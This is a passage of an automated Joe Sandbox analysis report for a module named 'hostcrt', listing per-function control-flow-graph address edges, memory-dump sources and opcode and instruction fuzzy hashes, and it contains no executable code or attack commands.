7ffd9c1cb176 232->253 235 7ffd9c1cb30b-7ffd9c1cb315 233->235 234->236 247 7ffd9c1cb317-7ffd9c1cb32a 235->247 264 7ffd9c1cb218-7ffd9c1cb229 236->264 237->212 248 7ffd9c1cb334 237->248 238->240 239->240 249 7ffd9c1cb343 239->249 260 7ffd9c1cb34a-7ffd9c1cb34d 240->260 261 7ffd9c1cb2d0 240->261 241->221 251 7ffd9c1cb250 241->251 242->226 243->200 252 7ffd9c1cb1d9-7ffd9c1cb1da 243->252 247->218 248->228 249->260 251->242 252->216 253->188 256 7ffd9c1cb178 253->256 254->212 255->233 258 7ffd9c1cb28d-7ffd9c1cb28f 255->258 256->193 258->235 262 7ffd9c1cb291 258->262 260->223 261->247 265 7ffd9c1cb2d2-7ffd9c1cb2da 261->265 262->264 266 7ffd9c1cb293 262->266 264->199 264->204 265->210 266->205
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c33571887370a04c3c2192cd6713f690321da1b1fbfa6f9e338955103ea88e4d
                                                            • Instruction ID: 7300aabedb64465a234f1c34340587b1befbc2006af557539461c08545dd76f2
                                                            • Opcode Fuzzy Hash: c33571887370a04c3c2192cd6713f690321da1b1fbfa6f9e338955103ea88e4d
                                                            • Instruction Fuzzy Hash: C432A831B58A1A8FDBA8EB58C8659B877F1FF54310F1041B9E01DD7292DE24AC85CB85
                                                            Function 00007FFD9C1CC4F5 Relevance: .4, Instructions: 427COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7799b2c32c1653d09e8caac64e7f72a04a861a8c613b5aeb0cb8a81022e6ff2
                                                            • Instruction ID: 51606e264a1f568cc5b03fa2c6405ffef35aa4e64579761a820ce2704ae88ffb
                                                            • Opcode Fuzzy Hash: b7799b2c32c1653d09e8caac64e7f72a04a861a8c613b5aeb0cb8a81022e6ff2
                                                            • Instruction Fuzzy Hash: 1CD12B23B4DA8B4FD7A5EB6884746B877F1EF99390B0901B7E04DD72D2DE18AC058345
                                                            Function 00007FFD9C1C3BA1 Relevance: .4, Instructions: 410COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 351 7ffd9c1c3ba1 352 7ffd9c1c3ba6-7ffd9c1c3bae 351->352 353 7ffd9c1c3bb4-7ffd9c1c3bc6 call 7ffd9c1c3570 352->353 354 7ffd9c1c3d31-7ffd9c1c3d45 352->354 359 7ffd9c1c3bc8-7ffd9c1c3bcd 353->359 360 7ffd9c1c3b95-7ffd9c1c3b9c 353->360 356 7ffd9c1c3d47 354->356 357 7ffd9c1c3d4c-7ffd9c1c3d57 354->357 356->357 361 7ffd9c1c3bef-7ffd9c1c3c00 359->361 362 7ffd9c1c3bcf-7ffd9c1c3bd3 359->362 363 7ffd9c1c3d70-7ffd9c1c3d75 360->363 366 7ffd9c1c3c06-7ffd9c1c3c1b 361->366 367 7ffd9c1c3d7a-7ffd9c1c3d95 361->367 364 7ffd9c1c3bd9-7ffd9c1c3bea 362->364 365 7ffd9c1c3cd3-7ffd9c1c3ce4 362->365 363->351 364->354 369 7ffd9c1c3ce6 365->369 370 7ffd9c1c3ceb-7ffd9c1c3cf6 365->370 366->367 368 7ffd9c1c3c21-7ffd9c1c3c2d 366->368 374 7ffd9c1c3d97 367->374 375 7ffd9c1c3d9d 367->375 372 7ffd9c1c3c2f-7ffd9c1c3c46 call 7ffd9c1c2080 368->372 373 7ffd9c1c3c5e-7ffd9c1c3c74 call 7ffd9c1c3570 368->373 369->370 372->365 385 7ffd9c1c3c4c-7ffd9c1c3c5b call 7ffd9c1c21b0 372->385 373->365 382 7ffd9c1c3c76-7ffd9c1c3c81 373->382 374->375 379 7ffd9c1c3d9f 375->379 380 7ffd9c1c3da1-7ffd9c1c3db8 375->380 379->380 383 7ffd9c1c3dba-7ffd9c1c3e03 380->383 384 7ffd9c1c3e01 380->384 382->367 386 7ffd9c1c3c87-7ffd9c1c3c9c 382->386 394 7ffd9c1c3dcb-7ffd9c1c3e07 383->394 395 7ffd9c1c3e0e-7ffd9c1c3e2c 383->395 384->383 385->373 386->367 390 7ffd9c1c3ca2-7ffd9c1c3cb5 386->390 392 7ffd9c1c3cb7-7ffd9c1c3cd1 call 7ffd9c1c2080 390->392 393 7ffd9c1c3d09-7ffd9c1c3d11 390->393 392->365 404 7ffd9c1c3cf7-7ffd9c1c3d06 call 7ffd9c1c21b0 392->404 399 7ffd9c1c3d19-7ffd9c1c3d1c 393->399 411 7ffd9c1c3de5-7ffd9c1c3e00 394->411 412 7ffd9c1c3e2e-7ffd9c1c3e60 394->412 402 7ffd9c1c3d23-7ffd9c1c3d2b 399->402 402->354 409 7ffd9c1c3b6a-7ffd9c1c3b77 402->409 404->393 409->402 410 7ffd9c1c3b7d-7ffd9c1c3b91 409->410 410->402 416 7ffd9c1c3f48 412->416 417 7ffd9c1c3e65-7ffd9c1c3f4d 412->417 416->417 420 7ffd9c1c3e7c-7ffd9c1c3f57 417->420 421 7ffd9c1c3f61-7ffd9c1c3f7f 417->421 429 7ffd9c1c3ea6-7ffd9c1c3ea9 420->429 430 7ffd9c1c3f2d-7ffd9c1c3f45 420->430 429->430 431 7ffd9c1c3eaf-7ffd9c1c3eb2 429->431 430->416 433 7ffd9c1c3f1b-7ffd9c1c3f22 431->433 434 7ffd9c1c3eb4-7ffd9c1c3ee1 431->434 435 7ffd9c1c3f24-7ffd9c1c3f2c 433->435 436 7ffd9c1c3ee2-7ffd9c1c3efc 433->436 437 7ffd9c1c3f02-7ffd9c1c3f0d 436->437 438 7ffd9c1c3f81-7ffd9c1c3fd1 call 7ffd9c1c07c0 436->438 437->438 440 7ffd9c1c3f0f-7ffd9c1c3f19 437->440 440->433
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c2deb9d9dc78cc09a79555f119dae011116589478202343bb2a376dad679c9a
                                                            • Instruction ID: 48445087dc80a59c7643b3d830e40a8e0f14697bc4e2fc2cc268a70ec5ce50b5
                                                            • Opcode Fuzzy Hash: 1c2deb9d9dc78cc09a79555f119dae011116589478202343bb2a376dad679c9a
                                                            • Instruction Fuzzy Hash: 2ED1F531A4CB478FD378EB68D0A65B577F1FF48340B9045BEE44AC3692DE29B8418785
                                                            Function 00007FFD9C1CEB5F Relevance: .4, Instructions: 365COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 448 7ffd9c1ceb5f-7ffd9c1ceb72 449 7ffd9c1ceb74-7ffd9c1ceeb5 448->449 450 7ffd9c1cebbe-7ffd9c1cebd4 448->450 455 7ffd9c1ceebf-7ffd9c1ceefe 449->455 452 7ffd9c1cebda-7ffd9c1cebe2 450->452 453 7ffd9c1cec64-7ffd9c1cec94 450->453 454 7ffd9c1cebe8-7ffd9c1cebfa 452->454 452->455 462 7ffd9c1cec9a-7ffd9c1cec9b 453->462 463 7ffd9c1ced3e-7ffd9c1ced47 453->463 454->455 457 7ffd9c1cec00-7ffd9c1cec17 454->457 467 7ffd9c1cef00 455->467 459 7ffd9c1cec19-7ffd9c1cec20 457->459 460 7ffd9c1cec57-7ffd9c1cec5e 457->460 459->455 464 7ffd9c1cec26-7ffd9c1cec54 459->464 460->452 460->453 466 7ffd9c1cec9e-7ffd9c1cecb4 462->466 468 7ffd9c1ced4d-7ffd9c1ced53 463->468 469 7ffd9c1cee7f-7ffd9c1ceea5 463->469 464->460 466->455 470 7ffd9c1cecba-7ffd9c1cecde 466->470 474 7ffd9c1cef0b-7ffd9c1cefa1 467->474 468->455 471 7ffd9c1ced59-7ffd9c1ced68 468->471 472 7ffd9c1ced31-7ffd9c1ced38 470->472 473 7ffd9c1cece0-7ffd9c1ced03 call 7ffd9c1c7808 470->473 476 7ffd9c1cee72-7ffd9c1cee79 471->476 477 7ffd9c1ced6e-7ffd9c1ced75 471->477 472->463 472->466 473->455 485 7ffd9c1ced09-7ffd9c1ced2f 473->485 486 7ffd9c1cefac-7ffd9c1cf033 474->486 487 7ffd9c1cef26-7ffd9c1cefa6 474->487 476->468 476->469 477->455 480 7ffd9c1ced7b-7ffd9c1ced87 call 7ffd9c1c7808 477->480 484 7ffd9c1ced8c-7ffd9c1ced97 480->484 488 7ffd9c1ced99-7ffd9c1cedb0 484->488 489 7ffd9c1cedd6-7ffd9c1cede5 484->489 485->472 485->473 510 7ffd9c1cf035-7ffd9c1cf082 call 7ffd9c210828 486->510 511 7ffd9c1cf088-7ffd9c1cf498 486->511 487->486 498 7ffd9c1cef48-7ffd9c1cefa8 487->498 488->455 492 7ffd9c1cedb6-7ffd9c1cedd2 488->492 489->455 494 7ffd9c1cedeb-7ffd9c1cee0f 489->494 492->488 496 7ffd9c1cedd4 492->496 497 7ffd9c1cee12-7ffd9c1cee2f 494->497 500 7ffd9c1cee52-7ffd9c1cee68 496->500 497->455 501 7ffd9c1cee35-7ffd9c1cee50 497->501 498->486 506 7ffd9c1cef6c-7ffd9c1cefaa 498->506 500->455 504 7ffd9c1cee6a-7ffd9c1cee6e 500->504 501->497 501->500 504->476 506->486 513 7ffd9c1cef8d-7ffd9c1cefa0 506->513 510->511
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7554709b2830b81531c0aba9f779a6257876e42a24c1637f57d2c6248201208
                                                            • Instruction ID: 99f6a1490341b932c75772ab3aa636f0ff6c4a0c99417e33f00e03afe39fdc8d
                                                            • Opcode Fuzzy Hash: e7554709b2830b81531c0aba9f779a6257876e42a24c1637f57d2c6248201208
                                                            • Instruction Fuzzy Hash: A3D1D3316585468FEB69DF48C4E15B037B1FF49390B5442BDD85B8B68ACA38F881CB89
                                                            Function 00007FFD9C1CEB7F Relevance: .3, Instructions: 336COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 522 7ffd9c1ceb7f-7ffd9c1ceb88 523 7ffd9c1ceb8e-7ffd9c1ceb9f 522->523 524 7ffd9c1ceebf-7ffd9c1cef00 522->524 525 7ffd9c1cebb5-7ffd9c1cebbc 523->525 526 7ffd9c1ceba1-7ffd9c1ceba5 523->526 540 7ffd9c1cef0b-7ffd9c1cefa1 524->540 528 7ffd9c1ceb74-7ffd9c1ceeb5 525->528 529 7ffd9c1cebbe-7ffd9c1cebd4 525->529 526->524 527 7ffd9c1cebab-7ffd9c1cebb3 526->527 527->525 528->524 532 7ffd9c1cebda-7ffd9c1cebe2 529->532 533 7ffd9c1cec64-7ffd9c1cec94 529->533 532->524 536 7ffd9c1cebe8-7ffd9c1cebfa 532->536 543 7ffd9c1cec9a-7ffd9c1cec9b 533->543 544 7ffd9c1ced3e-7ffd9c1ced47 533->544 536->524 538 7ffd9c1cec00-7ffd9c1cec17 536->538 541 7ffd9c1cec19-7ffd9c1cec20 538->541 542 7ffd9c1cec57-7ffd9c1cec5e 538->542 552 7ffd9c1cefac-7ffd9c1cf033 540->552 553 7ffd9c1cef26-7ffd9c1cefa6 540->553 541->524 546 7ffd9c1cec26-7ffd9c1cec54 541->546 542->532 542->533 548 7ffd9c1cec9e-7ffd9c1cecb4 543->548 549 7ffd9c1ced4d-7ffd9c1ced53 544->549 550 7ffd9c1cee7f-7ffd9c1ceea5 544->550 546->542 548->524 551 7ffd9c1cecba-7ffd9c1cecde 548->551 549->524 554 7ffd9c1ced59-7ffd9c1ced68 549->554 555 7ffd9c1ced31-7ffd9c1ced38 551->555 556 7ffd9c1cece0-7ffd9c1ced03 call 7ffd9c1c7808 551->556 587 7ffd9c1cf035-7ffd9c1cf082 call 7ffd9c210828 552->587 588 7ffd9c1cf088-7ffd9c1cf498 552->588 553->552 567 7ffd9c1cef48-7ffd9c1cefa8 553->567 559 7ffd9c1cee72-7ffd9c1cee79 554->559 560 7ffd9c1ced6e-7ffd9c1ced75 554->560 555->544 555->548 556->524 571 7ffd9c1ced09-7ffd9c1ced2f 556->571 559->549 559->550 560->524 564 7ffd9c1ced7b-7ffd9c1ced87 call 7ffd9c1c7808 560->564 569 7ffd9c1ced8c-7ffd9c1ced97 564->569 567->552 579 7ffd9c1cef6c-7ffd9c1cefaa 567->579 573 7ffd9c1ced99-7ffd9c1cedb0 569->573 574 7ffd9c1cedd6-7ffd9c1cede5 569->574 571->555 571->556 573->524 576 7ffd9c1cedb6-7ffd9c1cedd2 573->576 574->524 577 7ffd9c1cedeb-7ffd9c1cee0f 574->577 576->573 580 7ffd9c1cedd4 576->580 581 7ffd9c1cee12-7ffd9c1cee2f 577->581 579->552 591 7ffd9c1cef8d-7ffd9c1cefa0 579->591 584 7ffd9c1cee52-7ffd9c1cee68 580->584 581->524 586 7ffd9c1cee35-7ffd9c1cee50 581->586 584->524 590 7ffd9c1cee6a-7ffd9c1cee6e 584->590 586->581 586->584 587->588 590->559
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52737b18c2f2e168d4dc4656c0147240192235426c4c9ec80be863f28888ed34
                                                            • Instruction ID: 80dca16e084f7d35e190200b86c814730f05ec128a45f399221733589a367996
                                                            • Opcode Fuzzy Hash: 52737b18c2f2e168d4dc4656c0147240192235426c4c9ec80be863f28888ed34
                                                            • Instruction Fuzzy Hash: 9AC1D1316585468BEB2DDF48C4E15B137B1FF45380B5446BDE85B8B68BCA38F881CB89
                                                            Function 00007FFD9C1CE412 Relevance: .3, Instructions: 325COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 600 7ffd9c1ce412-7ffd9c1ce419 601 7ffd9c1ce635-7ffd9c1ce646 600->601 602 7ffd9c1ce41f-7ffd9c1ce451 call 7ffd9c1ce1b0 call 7ffd9c1ce080 600->602 603 7ffd9c1ce648 601->603 604 7ffd9c1ce64d-7ffd9c1ce658 601->604 602->601 609 7ffd9c1ce457-7ffd9c1ce4a9 call 7ffd9c1ce1b0 call 7ffd9c1ce080 602->609 603->604 609->601 616 7ffd9c1ce4af-7ffd9c1ce4f4 call 7ffd9c1ce1b0 609->616 622 7ffd9c1ce4f6-7ffd9c1ce50a call 7ffd9c1ce080 616->622 623 7ffd9c1ce564-7ffd9c1ce5a0 call 7ffd9c1c9a00 616->623 622->601 629 7ffd9c1ce510-7ffd9c1ce533 call 7ffd9c1ce1b0 622->629 635 7ffd9c1ce5d9-7ffd9c1ce5e0 call 7ffd9c1c8ab8 623->635 633 7ffd9c1ce539-7ffd9c1ce549 629->633 634 7ffd9c1ce705-7ffd9c1ce71c 629->634 633->634 636 7ffd9c1ce54f-7ffd9c1ce562 633->636 640 7ffd9c1ce71e 634->640 641 7ffd9c1ce71f-7ffd9c1ce72d 634->641 639 7ffd9c1ce5e5-7ffd9c1ce5ea 635->639 636->622 636->623 642 7ffd9c1ce5ec-7ffd9c1ce5ee 639->642 643 7ffd9c1ce5a2-7ffd9c1ce5c2 639->643 640->641 645 7ffd9c1ce735 641->645 646 7ffd9c1ce72f 641->646 642->601 647 7ffd9c1ce5f0-7ffd9c1ce5f3 642->647 643->634 644 7ffd9c1ce5c8-7ffd9c1ce5d3 643->644 644->635 648 7ffd9c1ce6bb-7ffd9c1ce6cf 644->648 649 7ffd9c1ce739-7ffd9c1ce778 645->649 650 7ffd9c1ce737 645->650 646->645 651 7ffd9c1ce5f9-7ffd9c1ce614 647->651 652 7ffd9c1ce5f5 647->652 653 7ffd9c1ce6d6-7ffd9c1ce6e1 648->653 654 7ffd9c1ce6d1 648->654 656 7ffd9c1ce779 649->656 658 7ffd9c1ce77a-7ffd9c1ce9ba 649->658 650->649 650->656 651->634 655 7ffd9c1ce61a-7ffd9c1ce633 call 7ffd9c1ce080 651->655 652->651 654->653 655->601 662 7ffd9c1ce659-7ffd9c1ce672 call 7ffd9c1ce1b0 655->662 656->658 662->634 666 7ffd9c1ce678-7ffd9c1ce67f 662->666 667 7ffd9c1ce6a9-7ffd9c1ce6b1 666->667 668 7ffd9c1ce681-7ffd9c1ce69d 667->668 669 7ffd9c1ce6b3-7ffd9c1ce6b9 667->669 668->634 671 7ffd9c1ce69f-7ffd9c1ce6a7 668->671 669->648 670 7ffd9c1ce6e2 669->670 670->634 671->667
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f2c275009bf686603720517b474ea01d3e93bad3af24ad287e11c890f944e40
                                                            • Instruction ID: ea0945322039686f7935dfe2a0a9e6eea3b68262dfc9a51c08383df1df6fd6ae
                                                            • Opcode Fuzzy Hash: 7f2c275009bf686603720517b474ea01d3e93bad3af24ad287e11c890f944e40
                                                            • Instruction Fuzzy Hash: A9B1D431B58A478FE759EB58C0A16B4B7B1FF59380F544179E04EC7A86CB28F861CB84
                                                            Function 00007FFD9C1C2412 Relevance: .3, Instructions: 324COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 672 7ffd9c1c2412-7ffd9c1c2419 673 7ffd9c1c2635-7ffd9c1c2646 672->673 674 7ffd9c1c241f-7ffd9c1c2451 call 7ffd9c1c21b0 call 7ffd9c1c2080 672->674 675 7ffd9c1c2648 673->675 676 7ffd9c1c264d-7ffd9c1c2658 673->676 674->673 681 7ffd9c1c2457-7ffd9c1c24a9 call 7ffd9c1c21b0 call 7ffd9c1c2080 674->681 675->676 681->673 688 7ffd9c1c24af-7ffd9c1c24f4 call 7ffd9c1c21b0 681->688 694 7ffd9c1c24f6-7ffd9c1c250a call 7ffd9c1c2080 688->694 695 7ffd9c1c2564-7ffd9c1c25a0 688->695 694->673 700 7ffd9c1c2510-7ffd9c1c2533 call 7ffd9c1c21b0 694->700 704 7ffd9c1c25d9-7ffd9c1c25de 695->704 705 7ffd9c1c2705-7ffd9c1c271c 700->705 706 7ffd9c1c2539-7ffd9c1c2549 700->706 709 7ffd9c1c25e5-7ffd9c1c25ea 704->709 710 7ffd9c1c271f-7ffd9c1c272d 705->710 711 7ffd9c1c271e 705->711 706->705 707 7ffd9c1c254f-7ffd9c1c2562 706->707 707->694 707->695 712 7ffd9c1c25ec-7ffd9c1c25ee 709->712 713 7ffd9c1c25a2-7ffd9c1c25c2 709->713 715 7ffd9c1c2735 710->715 716 7ffd9c1c272f 710->716 711->710 712->673 717 7ffd9c1c25f0-7ffd9c1c25f3 712->717 713->705 714 7ffd9c1c25c8-7ffd9c1c25d3 713->714 714->704 718 7ffd9c1c26bb-7ffd9c1c26cf 714->718 719 7ffd9c1c2737 715->719 720 7ffd9c1c2739-7ffd9c1c2778 715->720 716->715 721 7ffd9c1c25f5 717->721 722 7ffd9c1c25f9-7ffd9c1c2614 717->722 724 7ffd9c1c26d6-7ffd9c1c26e1 718->724 725 7ffd9c1c26d1 718->725 719->720 723 7ffd9c1c2779 719->723 720->723 728 7ffd9c1c277a-7ffd9c1c29ba 720->728 721->722 722->705 726 7ffd9c1c261a-7ffd9c1c2633 call 7ffd9c1c2080 722->726 723->728 725->724 726->673 732 7ffd9c1c2659-7ffd9c1c2672 call 7ffd9c1c21b0 726->732 732->705 736 7ffd9c1c2678-7ffd9c1c267f 732->736 737 7ffd9c1c26a9-7ffd9c1c26b1 736->737 738 7ffd9c1c26b3-7ffd9c1c26b9 737->738 739 7ffd9c1c2681-7ffd9c1c269d 737->739 738->718 741 7ffd9c1c26e2 738->741 739->705 740 7ffd9c1c269f-7ffd9c1c26a7 739->740 740->737 741->705
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 31a0431563536b0b1d7f2b9b126cf078898daeb67c6ea91f45213e35d1152041
                                                            • Instruction ID: 400ad9d493e41d1a0df4ab00e68731017b65bfd102f83261eb7b2e6d85747109
                                                            • Opcode Fuzzy Hash: 31a0431563536b0b1d7f2b9b126cf078898daeb67c6ea91f45213e35d1152041
                                                            • Instruction Fuzzy Hash: 1EB1E231A08A478FE759EB68C0A16B4B7B1FF58300F144179E44EC7A87CB28B861CB94
                                                            Function 00007FFD9C1CBBF2 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aaa822a99270fede61a71d416316e9d8b2ea134f599e65402a0ff7d2e2353a99
                                                            • Instruction ID: a68146c1acbe711b47945c81eaf0f7274bc0d3803e3f5314611fb1f01c929f8b
                                                            • Opcode Fuzzy Hash: aaa822a99270fede61a71d416316e9d8b2ea134f599e65402a0ff7d2e2353a99
                                                            • Instruction Fuzzy Hash: 2C31A132F8C55B8EE779EA9884715B877B0EF44B80F1441BAF10DE21C2CE2968808785
                                                            Function 00007FFD9C1CC1FA Relevance: .3, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6971ba4a51dce24741e1135a6e458277b25281801f1cb61ee1549c2195baa2c5
                                                            • Instruction ID: 3565f153e658a049c2bb183d05b09120788d04e04ff9ffeb7bacdf44821e07d9
                                                            • Opcode Fuzzy Hash: 6971ba4a51dce24741e1135a6e458277b25281801f1cb61ee1549c2195baa2c5
                                                            • Instruction Fuzzy Hash: 9DA10663E4CADB4FE775ABE8D8B51A87B70FF55394F0401B6E099AA1C3DD182C028745
                                                            Function 00007FFD9C1CD956 Relevance: .3, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e32d936853e1b04b0a06da2eb48b7160302e4406817073f9399046c1b254091
                                                            • Instruction ID: 911037240a102adf83c17ab3eec284c790012ddb1e3616028e54e87d13677367
                                                            • Opcode Fuzzy Hash: 6e32d936853e1b04b0a06da2eb48b7160302e4406817073f9399046c1b254091
                                                            • Instruction Fuzzy Hash: 7C812933B9CA434BF738BA9894652B977F0EF55354B14057EE48ED3282DE29B8028749
                                                            Function 00007FFD9C1C1946 Relevance: .3, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2828c24ca3ae49dd0fe50e7b14e79c0d8e6dfc4d6157cec888d6c7bcbaf0656b
                                                            • Instruction ID: 2354aa747d441652e305f7013b98c3e1fc79bb245363b1e1381332dd32dabb08
                                                            • Opcode Fuzzy Hash: 2828c24ca3ae49dd0fe50e7b14e79c0d8e6dfc4d6157cec888d6c7bcbaf0656b
                                                            • Instruction Fuzzy Hash: 6B812933BCCA474BE73CAA98946127577F0EF55394B24057EE48FD3292DE29B8028746
                                                            Function 00007FFD9C1C2D6F Relevance: .3, Instructions: 256COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 123922a63c9981566272c5d39656aab2083e56047c8f3c21c01332f7792c5a85
                                                            • Instruction ID: ea286a3e350d962f98d47c3f5f53fbde4a0d7eb59b84b0e024dde9df504a2ce0
                                                            • Opcode Fuzzy Hash: 123922a63c9981566272c5d39656aab2083e56047c8f3c21c01332f7792c5a85
                                                            • Instruction Fuzzy Hash: AD91063165865A8FEB69DB58C0E06B43BB1FF55310F5441FDD84ADB58BCA38E882CB44
                                                            Function 00007FFD9C1CB879 Relevance: .2, Instructions: 250COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: af9261079232ad6d27ae994850b74376f6e379b167dbafa9a82846b91c0c7eed
                                                            • Instruction ID: 6808dd0da78c5feae0915565a1837bc8122f4061c565f9e4e99ffde6ee712a0d
                                                            • Opcode Fuzzy Hash: af9261079232ad6d27ae994850b74376f6e379b167dbafa9a82846b91c0c7eed
                                                            • Instruction Fuzzy Hash: 4A716AB2A8C54F4FE778FA5884665B433E0FF45350B104279F09ED75E2DE18A886C785
                                                            Function 00007FFD9C1CAB8B Relevance: .2, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8c77f1747a8901b458761b2390ddf236fd105ef11346de1bfcc3ab18460d557
                                                            • Instruction ID: 4f7624156cf28a91983b9e09e0be7c05425d1d08d8b59f67a75201e79b46caf7
                                                            • Opcode Fuzzy Hash: a8c77f1747a8901b458761b2390ddf236fd105ef11346de1bfcc3ab18460d557
                                                            • Instruction Fuzzy Hash: A171C732E5C54F8FE76AEBA488646FC77B1EF55380F1005BAE00EE71C2DE2869418745
                                                            Function 00007FFD9C1C064B Relevance: .2, Instructions: 204COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d286108d810e56ce988f9481b50afcee7a485f031339c782e8a4a1093fe0139b
